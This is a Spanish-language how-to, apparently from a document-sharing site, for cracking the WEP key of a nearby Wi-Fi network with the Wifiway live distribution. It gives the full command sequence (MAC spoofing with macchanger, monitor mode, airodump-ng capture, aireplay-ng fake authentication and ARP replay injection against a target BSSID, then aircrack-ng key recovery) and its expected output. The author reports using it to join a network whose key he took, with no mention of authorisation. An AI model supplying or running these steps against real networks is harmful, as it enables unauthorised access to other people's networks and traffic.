Você está na página 1de 3

Primero todo lo ha descargar y necesario

1 CD o Pendrive que se soporte como booteable de 1GB


Distribucion GNU Linux de WIFIWAY

http://download.wifislax.com:8080/wifiway-1-final.iso
Un adaptador Wifi que soporte el modo monitor
unos 2 kilos de paciencia
1- Bajarse la dsitribucion linux ( si lo vas a grabar saltate el paso 2)
2- Convertir tu pendrive a booteable es facil, descomprime la imagen, copia las
dos carpetas a tu usb, vas a ejecutar y escribes cmd, escribes x: segun sea la l
etra de tu pendrive, escribes cd boot/ y luego escribes bootinst.bat, te dira pe
rsiona una tecla y estara listo dira succefull y presiona una tecla para salir
3- ahora reinicias y activas el boot del cd o pendrive segun sea el caso y le da
mos click a la primera opcion que veamos y cuando cargue escribes startx para in
iciar
Nombre de nuestra tarjeta, modo monitor y detectar redes a nuestro alcance
-Averiguamos cual es nuestra tarjeta wifi: Inicio/Centro de control/Internet y r
ed/Red inalámbrica. En la pestaña Configuración 1 si esta marcado Autodetectar , ya sale
nombre en el campo Interfaz (en este caso ath0 )
- Abrimos el modo monitor de nuestra tarjeta: Inicio/Wifiway/Chipset/Atheros/Add
interface (Mode monitor). Lo minimizamos pero no lo cerramos.
- Para ver que redes podemos abrir, vamos a Inicio/Wifiway/Suite aircrack-ng/Air
odump-ng. Seleccionamos nuestra tarjeta (en este caso ath0). Aplicar y Ok . Veremos l
as redes a nuestro alcance con varios datos como el canal (CH) y la encriptación (
WEP, WPA, WPA2, etc). Las nuestras son las WEP. Nos quedamos con la que tenga más
fuerza (más PWR) y nos fijamos en el canal. En este caso es el 9. Cerramos la vent
ana.
3 Cambiar MAC a la tarjeta, capturar tráfico e inyectar tráfico
- En el escritorio, pinchamos en un icono llamado Konsole
- Cuando se abra cambiamos la MAC de nuestra tarjeta:
* ifconfig ath0 down
* macchanger -m 00:11:22:33:44:55 ath0
Pondrá lo siguiente
- Current MAC: xx:xx:xx:xx:xx:xx (unknown)
- Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
* ifconfig ath0 up
-Se debe cambiar el canal de nuestra tarjeta en otra console : airmon-ng start [
interface] c (canal)
Ejemplo: airmon-ng start ath0 -c 3
para asegurarte hazlo varias veces: copiar pegar, este comando tambien activa el
modo monitor
- Empezamos a capturar tráfico (el 9 en este caso es el canal en el que me fijé ante
s):
* airodump-ng -w captura -c 9 ath0
- Si suben mucho los #DATA (necesitamos unos 200.000) nos saltamos estos pasos y
seguimos en el punto 4. Sino es que no hay tráfico y hay que crearlo.
- Pinchamos otra vez en el escritorio en el icono Konsole (todo esto sin cerrar la
s ventanas anteriores). Creamos una asociación en el Punto de Acceso.
* aireplay-ng -1 0 e WLAN_47 -a 00:19:CB:XX:XX:XX -h 00:11:22:33:44:55 ath0
(00:19:CB:XX:XX:XX es la dirección de la red. También aparece en la ventana anterior
donde ejecutamos airodump-ng debajo de BSSID . WLAN_47 es la red que me interesa.
Va entre comillas y con mayúsculas o minúsculas según aparezca a la derecha de todo en
la ventana anterior (donde ejecutamos airodump-ng que esta intentado capturar e
l tráfico). Si es un nombre simple creo que vale de cualquier forma y sin comillas
Si todo esta bien, aparece:
- Sending Authentication Request (Open System) [ACK]
- Authentication successful
- Sending Association Request [ACK]
- Association succesful (AID:1)
- Empezamos a inyectar tráfico:
* aireplay-ng -3 b 00:19:CB:XX:XX:XX h 00:11:22:33:44:55 ath0
- En breve deberían empezar a subir los #DATA en la ventana del Airodump
4 Descifrar el código
- En el escritorio abrimos Personal . Ahí nos aparecerán los archivos que hemos creado
( Captura ). Dependiendo de si hemos estado haciendo pruebas, habrá más o menos. Normalm
ente es el más grande con extensión .cap. En mi caso, tengo captura-01.cap y captura-02
.cap . Me quedo con este último nombre
- En un rato y dependiendo de los miles de #DATA que tengamos (dependiendo de l
a fuerza de la señal tardará más o menos, pero esperaremos a tener al menos 150.000),
sin cerrar nada, abrimos en el escritorio Konsole .
* aircrack-ng captura-02.cap
- Escogemos en número de la red que nos interesa. En mi caso la 1
- Empezará a procesar los datos. Si en unos segundos no lo consigue, pulsamos Ctrl.
+C para que se detenga.
- Esperamos a que consiga más #DATA y volvemos a poner el mismo comando. Si tiene
#DATA suficientes, nos dará el código en un par de segundos.
- Cuando metamos el comando y obtenga la clave pondrá algo similar a esto:
KEY FOUND! [ 5A:30:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX ] (ASCII: Z00 02CFXXXXXX)
Decrpted correctly: 100%
- En mi caso necesité 136.000 #DATA
- Apuntamos los códigos en hexadecimal 5A:30:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX y en
ASCII 02CFXXXXXX
5 Salir y conectarnos con Windows
- Para salir, Inicio/Terminar y luego ponemos Poweroff
- Arrancamos Windows. Y logicamente vemos conexiones de red, nos tratamos de ing
resar e ingrasamos la clave
Algunos datos: postee esto porque funciona, lo poco que escribi en este post lo
hice desde mi casa conectado a una wep desde la que obtuve la clave, si no funci
ona es que sus chipsets no son compatibles o no lo hacen vien.
Un problema que tuve fue en el paso de crear la asociacion del punto de acceso p
orque a veces el canal no coincide aunque lo cambies, hay que escribir el comand
o muchas veces y probar

Você também pode gostar